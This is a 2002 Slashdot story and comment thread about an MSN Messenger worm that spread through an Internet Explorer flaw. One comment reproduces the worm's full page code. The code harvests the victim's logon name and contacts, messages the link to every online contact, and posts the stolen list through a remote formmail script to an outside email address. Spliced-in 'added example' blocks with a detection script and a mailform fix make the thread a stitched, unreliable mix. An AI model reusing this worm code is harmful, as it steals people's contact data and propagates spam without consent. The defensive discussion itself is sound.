
Microsoft Instant Messenger Virus Sweeps Net

michael posted more than 12 years ago | from the RISKs-of-homogeneous-computing dept.

Microsoft 401

Many people have reported a Warhol virus affecting users of Microsoft Instant Messenger. If you get messaged, "Go To http://www.masenko-media.net/cool.html NoW !!!", or any similar message (apparently there are several websites with the infection code), I suggest not following the link. A brief discussion follows.

Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.

There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.

Sophistication: moderate. Damage: only your pride.

Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.

Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?

401 comments

First Post (-1, Offtopic)

Metrollica (552191) | more than 12 years ago | (#3004030)

Suck it!

this didn't infect me.. (2, Funny)

Anonymous Coward | more than 12 years ago | (#3004038)

because I was using the linux version of Microsoft Messenger!

Re:this didn't infect me.. (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004068)

How in the hell is this 'informative'? Moderators, put down the pipe and get your asses back in school.

Re:this didn't infect me.. (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3004105)

is there even a msn messenger for linux? I think this guy was joking, the moderator took him too seriously. really funny that microsoft news is posted to slashdot, but then again, it's a bug (or a feature), so i guess it makes sense for them.

Re:this didn't infect me.. (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004084)

Nice to see this getting modded up!

I have 49 karma and usually don't post AC but I didn't want moderators thinking I used that software...you know, linux. It's kind of embarrassing, you know, since all my friends are Windows users.

This is news? (0, Flamebait)

WheelDweller (108946) | more than 12 years ago | (#3004040)

Isn't everything 'integrated' into Win9x prone to viruses? (Man, if we could only get these guys to write kernel code or GUI toolkits...)

Re:This is news? (1)

Stackis (308395) | more than 12 years ago | (#3004108)

Why the fuck does ./ even post this shit, and call it news...

They know damn well it's going to generate nothing but flamebait from the folks posting responses...

I guess I just don't get it...

Re:This is news? (2, Informative)

joshsisk (161347) | more than 12 years ago | (#3004126)

Uh, so people can download the patch before they get the virus, maybe?

Darn, too late (0, Offtopic)

Guspaz (556486) | more than 12 years ago | (#3004043)

Just submitted a lengthy story about this. Oh well. On another note, have you signed the futurama petition? Fox is canceling it. http://www.petitiononline.com/futufu/petition.html PS: First comment? By me? Wow!

Gee... (-1, Troll)

PrimeWaveZ (513534) | more than 12 years ago | (#3004044)

Is this really a surprise? God forbid Microsoft ever tried to make medical equipment.

Re:Gee... (0, Flamebait)

woodstok (17147) | more than 12 years ago | (#3004182)

Actually if you read the EULA for windows nt it says that it's not to be used at hospitals in life-preserving machines, nuclear plants and such. Not only did God forbid Microsoft, they actually listened :D

Re:Gee... (4, Informative)

Cally (10873) | more than 12 years ago | (#3004204)

Well this is Waaaay off-topic... but WTF ;)

Is this really a surprise? God forbid Microsoft ever tried to make medical equipment.


According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thin slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )

The solution... (0)

Anonymous Coward | more than 12 years ago | (#3004046)

Is the solution simply to not use Microsoft Messenger?

Re:The solution... (2, Interesting)

iamplasma (189832) | more than 12 years ago | (#3004173)

Yes, but guess what M$ have decided to make a compulsory add-on to windows XP. Yep, that's right, Messenger. I can just wait for the argument as to why "messenger is an essential part of windows".

Re:The solution... (1)

(startx) (37027) | more than 12 years ago | (#3004210)

it can be removed from xp. Read ntcompatible.com, then go change your registry and remove messenger! Oh, wait, I mean laff at your friends who use windows, right.........

.NET? (0)

Anonymous Coward | more than 12 years ago | (#3004050)

Someone probably used .NET for this -

Well, that's one less effectual site for vectoring (5, Funny)

Second_Derivative (257815) | more than 12 years ago | (#3004051)

If the entire population of slashdot accessing that site to point and laugh at the exploit code and how it doesn't affect them doesn't constitute a slashdotting, I dunno what does =) I already can't access it.

Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em ;)

Re:Well, that's one less effectual site for vector (3, Interesting)

JDizzy (85499) | more than 12 years ago | (#3004181)

Somebody mod this parent as "funny", or "underrated" because the author has a point, the slashdot effect should suffice to kill any of the infection sites, and with a high degree of impact.

Re:Well, that's one less effectual site for vector (0)

Anonymous Coward | more than 12 years ago | (#3004207)

So, because the site was posted on /. it went down. And therefore the virus can't spread. I do believe this is the first *POSITIVE* application of a /.ing ever.

in the eye of the beholder (3, Funny)

rakerman (409507) | more than 12 years ago | (#3004054)

With a name like Warhol, obviously this isn't a virus, it's a form of art.

Re:in the eye of the beholder (0)

Anonymous Coward | more than 12 years ago | (#3004214)

Uh... no.

A Warhol virus is one that can infect the entire Internet in 15 minutes (of fame, get it?)

Re:in the eye of the beholder (0)

Anonymous Coward | more than 12 years ago | (#3004226)

A really gay form of art...

Forwards are evil / Virus news (1, Interesting)

Covant (103882) | more than 12 years ago | (#3004055)

I was waiting for one of those super annoying forwarded URLs to cause trouble, and it's finally happened.

Why can't one single week go by without a big annoying MSFT bug / virus being exposed?

Do people save these bugs up and release havoc at regular intervals?

Are there people in the inside, planting seeds?

At least it makes for good news.

Re:Forwards are evil / Virus news (2, Insightful)

djsable (257312) | more than 12 years ago | (#3004104)

>> Why can't one single week go by without a big annoying MSFT bug / virus being exposed?

The media loves that crap. They descend on it like a shark smelling blood. Any other product could have worse bugs, and they would be all Ho Hum, but a MS bug/virus? whooo boy, feeding frenzy!!

Also, because the people who write the Virii target MS (it might just be easier too.) because of the LARGE install base of it. You can write a Linux virus, and it nails like 100 people, but you could write the same bug targeting MS products, and you can nail 100,000! You do the math. :) which is more tempting a target.

No system is 100% secure. Period, end of story.

MS products in general, are like swiss fricking cheese though. My big complaint is the "Turn It on By default" attitude of MS Products. I had the Messenger on my system, and after adding a couple of co-workers, never used it. I got nailed by the bug today, and was quite annoyed by it. Fortunately, the payload is non destructive, or I would have been PISSED. Leave it off by default, and IF I want it, I'll turn it on.

badger

ToO mAnY cApS!!!11 (5, Funny)

Anonymous Coward | more than 12 years ago | (#3004056)

iF yOuR fRiEnDs SeNd YoU mEsSaGeS fOrMaTtEd LiKe ThIs, YoU nEeD tO fInD nEw FrIeNdS!!!11

Other clients? (5, Insightful)

Geeyzus (99967) | more than 12 years ago | (#3004057)

I assume this only affects the MSN client from Microsoft... correct? Or does this also affect other clients that can use the MSN network, like Trillian? If it is just a link to some virus code on a website, it would affect Trillian (because it actually doesn't propagate through the instant messaging program)... but if it is something that gets triggered inside MSN Instant Messenger, then Trillian users are safe...

Mark

Thank you kind sir (-1, Troll)

Breakfast Pants (323698) | more than 12 years ago | (#3004077)

for stating the obvious.

Re:Other clients? (5, Informative)

Static_Neurotoxin (141004) | more than 12 years ago | (#3004078)

Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.

Re:Other clients? (2, Informative)

Qwerpafw (315600) | more than 12 years ago | (#3004096)

Fire (like trillian, but for OS X) doesn't seem to care. At least, as far as I can tell. Most likely the security hole lies in windows/MSN integration. or in the MSN client software. But not the messaging protocol.

Of course, the trillian people have a MUCH better track record in terms of patches and so forth (they keep updating so it'll work with AOL...) so even if it affects trillian (pretty sure the answer is NO...) they will fix it before M$.

Re:Other clients? (0)

Anonymous Coward | more than 12 years ago | (#3004232)

Actually, Trillian will work without a web browser, (98lite) while MSN messenger requires IE 4...
So visiting a malicious web-page shouldn't affect it, as it's not really "integrated" like IE/MSN-messenger.

Anyone surprised? (2, Insightful)

Qwerpafw (315600) | more than 12 years ago | (#3004059)

I for one, am not shocked at all :)

Anyone who is shocked is a bit of a fool. It was only a matter of time, really, until one of M$'s many security holes in messenger was exploited. Kinda sad to think what will happen in the future as OS becomes more and more integrated with the internet. Your personal data (courtesy of passport) might be spread around if you replied to a IM, or data loss.

Don't use microsoft products, so I am not vulnerable. Happy me.

Looks like they want in on the aim monopoly (0)

Anonymous Coward | more than 12 years ago | (#3004061)

First they want interoperability. Now aim has security exploits, so they have to have them too. Damn microsoft is childish.

what's the url? (4, Funny)

MathJMendl (144298) | more than 12 years ago | (#3004065)

What's the url for this virus? The link to "Go To http://www.masenko-media.net/cool.html NoW" wasn't clickable. Please fix this, /. admin!

Re:what's the url? (0, Redundant)

Schmerd (83210) | more than 12 years ago | (#3004100)

Are you serious? A URL is an address, not necessarily something you can click on. /. left off the HREF on purpose so that people wouldn't blindly click and get burned by the malicious code.

Re:what's the url? (0)

Anonymous Coward | more than 12 years ago | (#3004125)

Are you serious?
Never. :-)

Re:what's the url? (0)

Anonymous Coward | more than 12 years ago | (#3004174)

im gonna guess that it was a joke. calm yourself.

Re:what's the url? (3, Funny)

Covant (103882) | more than 12 years ago | (#3004199)

I think your sarcasm font is broken...

That reminds me, I wish MSN had tone markup's..
they've got enough of those dumb smiley faces.

The Code (5, Informative)

nihilist_1137 (536663) | more than 12 years ago | (#3004066)

Use Trillian: http://www.trillian.cc. A few people msg me with the link. All that happens is that a blank window pops up. Mind you, I am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html) is:
<html>
<head>
<title>Welcome</title>
<Script>

var msnWin;
var msnList;
var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";

function Go(){

msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F79568 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
focus();

if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}

function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";

for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}

else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}

function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}

</Script>
</head>
<body onload="Go()">
<p align="center">&nbsp;
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>
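
Added example (not part of the comment above or of the original thread): a static triage script for Node that flags a saved HTML page showing the behaviours visible in the posted code, namely a window opened on a res:// or about: document, an ActiveX object written into it by script, Messenger automation calls, and an auto-submitted cross-site form carrying a hidden recipient. The rule names, the threshold of three findings, the example.test hosts and the placeholder CLSID are assumptions of this sketch; both sample pages are constructed.

```javascript
// Heuristic rules over inline script text. Rule ids are this sketch's own names.
const SCRIPT_RULES = [
  // A window opened on a local resource page can inherit a more trusted zone.
  { id: 'local-resource-window',
    re: /\b(?:document|window)\.open\(\s*["'](?:res:\/\/|about:)/i },
  // Script writes an ActiveX <object> into another document.
  { id: 'activex-injected-by-script',
    re: /innerHTML\s*=\s*['"][^\n]*<object\s+classid\s*=\s*\\?["']?clsid:/i },
  // Window moved far off screen so the user never sees it.
  { id: 'offscreen-window', re: /\.moveTo\(\s*\d{4,}\s*,\s*\d{4,}\s*\)/ },
  // Method and property names the posted code uses to drive Messenger.
  { id: 'messenger-automation', re: /\.(?:sendText|autoLogon|localLogonName)\b/ },
  // Form submitted by script rather than by the user.
  { id: 'autosubmit-form', re: /document\.\w+\.submit\(\)/ },
];

// Parse attributes of one tag; handles quoted and unquoted values (type=hidden).
function parseAttrs(tag) {
  const attrs = {};
  const re = /([a-zA-Z_:][\w:.-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Collect each form's action, method and hidden fields.
function extractForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let f;
  while ((f = formRe.exec(html)) !== null) {
    const attrs = parseAttrs(f[1]);
    const hidden = {};
    for (const tag of f[2].match(/<input\b[^>]*>/gi) || []) {
      const a = parseAttrs(tag);
      if ((a.type || '').toLowerCase() === 'hidden' && a.name) {
        hidden[a.name.toLowerCase()] = a.value || '';
      }
    }
    forms.push({
      action: attrs.action || '',
      method: (attrs.method || 'GET').toUpperCase(),
      hidden,
    });
  }
  return forms;
}

// Return the list of matched rule ids and a verdict for one saved page.
function triage(html, pageUrl) {
  const findings = [];
  const scripts = (html.match(/<script\b[^>]*>[\s\S]*?<\/script>/gi) || []).join('\n');
  for (const rule of SCRIPT_RULES) {
    if (rule.re.test(scripts)) findings.push(rule.id);
  }
  const pageHost = new URL(pageUrl).hostname;
  for (const form of extractForms(html)) {
    let actionHost = pageHost;
    try { actionHost = new URL(form.action, pageUrl).hostname; } catch (_) { /* keep pageHost */ }
    // The page, not the mail script's owner, picks where the mail goes.
    if ('recipient' in form.hidden) findings.push('form-to-mail-recipient-in-page');
    if (form.method === 'POST' && actionHost !== pageHost) findings.push('cross-site-post');
  }
  if (/<body\b[^>]*\bonload\s*=/i.test(html)) findings.push('runs-on-load');
  // Threshold of three is an assumption; tune it against your own corpus.
  return { findings, verdict: findings.length >= 3 ? 'suspicious' : 'no-match' };
}

// Constructed sample with the same shape as the posted page (placeholder CLSID, inert hosts).
const SUSPECT_PAGE = `
<html><head><script>
var w = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
w.moveTo(10000, 10000);
w.document.body.innerHTML = '<object classid="clsid:00000000-0000-0000-0000-000000000000" id="o1"></object>';
var list = w.o1.list(0);
for (var i = 0; i < list.count; i++) { list(i).sendText("hdr", "msg", 0); }
document.contents.submit();
</script></head>
<body onload="Go()">
<form METHOD="POST" ACTION="http://mail.example.test/mailform.pl" NAME="contents">
<input type="hidden" name="recipient" value="collector@example.test">
<input type=hidden name="contentBox">
</form></body></html>`;

// Constructed benign page: same-site form, no hidden recipient, no script.
const BENIGN_PAGE = `
<html><body>
<form method="post" action="/contact">
<input type="text" name="email"><input type="hidden" name="csrf" value="constructed">
</form></body></html>`;

console.log(triage(SUSPECT_PAGE, 'http://www.example.test/cool.html'));
console.log(triage(BENIGN_PAGE, 'http://www.example.test/contact.html'));
```

The rules match source text only, so a page that builds the same calls from obfuscated strings will not be flagged; treat a hit as a reason to look closer, not a miss as a clean bill.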

My Slashdot Commenting Study (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004110)

Sorry, but I have to post this anonymously as I don't want to be moderated off-topic.

My Slashdot Commenting Study [erickrout.com]

Re:The Code (2, Informative)

suwain_2 (260792) | more than 12 years ago | (#3004116)

$ wget http://www.masenko-media.net/cool.html
--19:08:55-- http://www.masenko-media.net/cool.html
=> `cool.html'
Connecting to www.masenko-media.net:80... connected!
HTTP request sent, awaiting response... 404 Not Found
19:08:55 ERROR 404: Not Found.

Seems they took it down? Now is this just going to have millions of people getting 404 messages?

Re:The Code (4, Insightful)

einhverfr (238914) | more than 12 years ago | (#3004118)

So this sends the links to your contacts in IM and takes your passport email address and sends it to the http://www.yong.f2s.com/mailform.pl (or something similar).

Damage: not just your pride-- being bombarded with lots of spam? (I guess that is TBD)

Sends mail too .. email address harvesting? (5, Informative)

Wizard of OS (111213) | more than 12 years ago | (#3004221)

Look closely:

<input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">

I think somebody forgot that HTML source can be viewed ...

The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.
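
Added example (not from the thread and not the code of any real mailform script): the "open relay" behaviour described above comes from letting the submitted form choose the destination address. The sketch below puts that trusting routing beside a version that only accepts recipients from a server-side allowlist, checks the referring host, and rejects CR/LF in header fields. Field names follow the quoted form; the allowlists, addresses and function names are assumptions, the sample posts are constructed, and no mail is sent.

```javascript
// Server-side configuration (constructed values).
const ALLOWED_RECIPIENTS = new Set(['webmaster@site.example']);
const ALLOWED_REFERER_HOSTS = new Set(['www.site.example']);

// Trusting shape: whoever writes the HTML form decides where the mail goes,
// so any page on any site can use the script as its mailer.
function routeTrusting(fields) {
  return { to: fields.recipient, from: fields.email, subject: fields.subject };
}

// CR or LF in a value that ends up in a mail header lets the sender add headers.
function hasHeaderBreak(value) {
  return /[\r\n]/.test(value);
}

// Hardened shape: destination must match configuration, the submitting page
// must be one of ours, and header fields must be single-line.
// The Referer check only stops browser-driven abuse like the page in this
// thread; a hand-written client can forge it, so the allowlist is the real control.
function routeHardened(fields, referer) {
  const errors = [];
  const to = String(fields.recipient || '').trim().toLowerCase();
  if (!ALLOWED_RECIPIENTS.has(to)) errors.push('recipient-not-allowed');

  let refHost = '';
  try { refHost = new URL(referer).hostname; } catch (_) { /* missing or malformed */ }
  if (!ALLOWED_REFERER_HOSTS.has(refHost)) errors.push('foreign-referer');

  for (const name of ['email', 'subject']) {
    if (hasHeaderBreak(String(fields[name] || ''))) errors.push('header-injection:' + name);
  }
  if (errors.length > 0) return { ok: false, errors };
  return { ok: true, message: { to, from: fields.email, subject: fields.subject } };
}

// Constructed POST from a third-party page, shaped like the form in this thread.
const FOREIGN_POST = {
  recipient: 'collector@other.example',
  email: 'visitor@mail.example',
  subject: 'Wed Feb 13 2002',
  contentBox: 'Online Contact: ...',
};
// Constructed POST from the site's own contact page.
const OWN_POST = {
  recipient: 'webmaster@site.example',
  email: 'customer@mail.example',
  subject: 'Question about an order',
};
// Constructed POST that tries to smuggle an extra header through the subject.
const INJECTING_POST = {
  recipient: 'webmaster@site.example',
  email: 'customer@mail.example',
  subject: 'hello\r\nBcc: many@other.example',
};

console.log(routeTrusting(FOREIGN_POST));
console.log(routeHardened(FOREIGN_POST, 'http://www.other.example/cool.html'));
console.log(routeHardened(OWN_POST, 'http://www.site.example/contact.html'));
console.log(routeHardened(INJECTING_POST, 'http://www.site.example/contact.html'));
```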

Does this affect Trillian? (0)

Anonymous Coward | more than 12 years ago | (#3004071)

I use Trillian to connect to MS-IM. Can I be infected?
I also use Opera and I'm not daft enough to run downloaded software until I double check with the sender. I assume I'm safe, but I would like to know (so I can act all smug about using Trillian and Opera ;))

Well, they' (0, Flamebait)

z00r (552090) | more than 12 years ago | (#3004072)

Contrary to the Orwellian theme, it's clear that in the computer world, ignorance (which causes people to use Windows software) is a major liability.

could be a lot worse, likely will be soon (5, Interesting)

immanis (557955) | more than 12 years ago | (#3004074)

I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.

It worked too. Got to log into MSN as the CTO of our company, just to make a point.

As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.

Not a Messenger flaw (5, Informative)

Osty (16825) | more than 12 years ago | (#3004076)

First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.


Install the patch and be done with it.

Re:Not a Messenger flaw (5, Insightful)

RWarrior(fobw) (448405) | more than 12 years ago | (#3004224)

"Install the patch and be done with it."

Is that why I keep getting probed with NIMDA? Because people just install the patch and are done with it?

Re:Not a Messenger flaw (3, Insightful)

Tackhead (54550) | more than 12 years ago | (#3004236)

> First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions.

And while we're at it, this isn't a Warhol worm either.

I don't see the optimized scanning routine for initial propagation. I don't see a precompiled target list or any innovative ways to scan the network. And if you wanted to do maximum damage, you'd release it on a Friday night before this weekend.

Unless the spam from the formmail.pl script contains a very clever exploit to set the stage for a second round of infection, I'm calling this one a false alarm. It's an annoyance, but not a Warhol worm by any stretch of the imagination.

interesting article on the reg (5, Informative)

rogueuk (245470) | more than 12 years ago | (#3004080)

the register [theregister.co.uk] had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P

Re:interesting article on the reg (1)

Covant (103882) | more than 12 years ago | (#3004123)

Of course. They probably know about all the security flaws before they happen, they just don't bother to fix them.

It's like in Fight Club, the formula, if a (the cost of paying 10 programmers $100k/Annum each) * b (the time it would take to fix) * c (the percent of people that wouldn't buy/use IE / Windows regardless of the plethora of flaws) is greater than some inane constant, they don't fix it.

until it blows up.

Re:interesting article on the reg (1)

Osty (16825) | more than 12 years ago | (#3004228)

It's like in Fight Club, the formula, if a (the cost of paying 10 programmers $100k/Annum each) * b (the time it would take to fix) * c (the percent of people that wouldn't buy/use IE / Windows regardless of the plethora of flaws) is greater than some inane constant, they don't fix it.

Boy, I sure wish I was getting $100K/year. Oh well. Anyway, that equation is not quite correct, because

  1. It shouldn't take 10 programmers to fix that flaw. Maybe one programmer, one tester. Two people.
  2. Those people are going to get paid anyway. It's not like they're hired on the spot to fix those problems. They're already on the payroll, and fixing bugs is part of the job description.
  3. The time it takes to fix is only relevant if it affects other work. This is not always the case (not that it doesn't affect other work, but that it doesn't significantly hurt the other work in terms of slipping on a timeframe).
  4. The equation is typically a*b > c, they don't fix it, not a*b*c > some arbitrary number. In the Fight Club case, c was the cost of litigation (including settlements). In your example, it would be lost revenue. I'm not so sure that's a good measure, here, since IE is free.

Of course, this applies to pretty much every business, not just Microsoft.

Re:interesting article on the reg (0, Offtopic)

calags (12705) | more than 12 years ago | (#3004184)

You know a really virulent virus is coming when Microsoft insiders suddenly sell as much MS stock as they can. Just like the Enron higher ups they'll cut and run.

This brings up a question: If a real devastating security flaw is reported to them; they keep mum about it and then a massive security breach occurs that wipes out most MS OS machines out there (you know it's bound to happen :) does that mean that the SEC can move on them due to insider information?

Kinda funny.. (5, Funny)

jfroot (455025) | more than 12 years ago | (#3004081)

I get this message from this girl I kind of like on MSN saying to go to this URL urgently. So I do (duh!). Turns out it is a porn site.. So I'm thinking what is this girl saying? Is she dropping some not so subtle hints? As I ponder this I get a MSN message from my mom asking me why I sent her a link to a porn site.. then I understood..

Re:Kinda funny.. (0)

Anonymous Coward | more than 12 years ago | (#3004153)

Why did you send your mother a link to a porn site?

Re:Kinda funny.. (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3004159)

Was your mom the star of the porn site?

Warhol? worm (5, Informative)

blkros (304521) | more than 12 years ago | (#3004085)

The worm seems to be named because of a quote that the site attributes to Andy Warhol (i.e. 'in the future everyone will have his 15 minutes of fame.'). That quote should actually be attributed to Marshall McLuhan, who Andy ripped it off from. So these worms should be named McLuhan worms.

Re:Warhol? worm (0)

Anonymous Coward | more than 12 years ago | (#3004115)

How do you think Andy got his 15 min of fame? By ripping off that quote, the guy who originally said it also got 15 min somewhere too. Kind of ironic, eh?

Evildoers! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004090)

USA please execute these terrorists.

:o (1)

bender183 (447302) | more than 12 years ago | (#3004092)

i think the biggest implication of this is what the poster originally posted. If m$ is going to make messaging a corner stone of their .NET project the potential for a more advanced virus than this one could really mess sh*t up. :o

Not so sure the story is accurate. (4, Interesting)

einhverfr (238914) | more than 12 years ago | (#3004093)

The page appears to post a hidden form with your email information to the page. I suspect that it may be a contact gatherer for spammers (a new low...) though it could have done much more.

FormMail.pl is the perl script which receives this information. It is pretty interesting...

No DNS Record? (Geeky Observations) (-1, Interesting)

suwain_2 (260792) | more than 12 years ago | (#3004094)

Being the crazy geek I am, the very first thing I thought when I read this poll was "I wonder who owns the domain www.masenko-media.net" (the one that people are apparently sent to).


$ whois www.masenko-media.net

Whois Server Version 1.3

...

No match for "WWW.MASENKO-MEDIA.NET".


>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST..."

Okay, so no DNS, so the domain can't possibly resolve, right?


$ hostinfo -a www.masenko-media.net
66.96.247.55


Okay, so it does resolve to an IP... And I can ping it, too.

Re:No DNS Record? (Geeky Observations) (2, Informative)

jfroot (455025) | more than 12 years ago | (#3004112)

Just go to the registrar www.godaddy.com:

MASENKO-MEDIA.NET WHOIS results:

The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Re:No DNS Record? (Geeky Observations) (1)

Anonymous Coward | more than 12 years ago | (#3004117)

You fucking moron! The domain record applies to the domain only.

whois masenko-media.net

Re:No DNS Record? (Geeky Observations) (1)

dpu (525864) | more than 12 years ago | (#3004213)

i hope you don't talk that way to your (unfortunate) kids when they make a mistake.

Re:No DNS Record? (Geeky Observations) (0)

Anonymous Coward | more than 12 years ago | (#3004129)

$ whois masenko-media.net

Re:No DNS Record? (Geeky Observations) (5, Informative)

bovinewasteproduct (514128) | more than 12 years ago | (#3004147)

You might try just the domain name. Which comes out to:
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Looks fine to me..:)

BWP

Read my post, nuff said (1)

(startx) (37027) | more than 12 years ago | (#3004151)

mbrennek@spaceheater:~$ host www.masenko-media.net
www.masenko-media.net. is an alias for masenko-media.net.
masenko-media.net. has address 66.96.247.55
mbrennek@spaceheater:~$ whois masenko-media.net

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002

>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

Found InterNIC referral to whois.godaddy.com.

The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

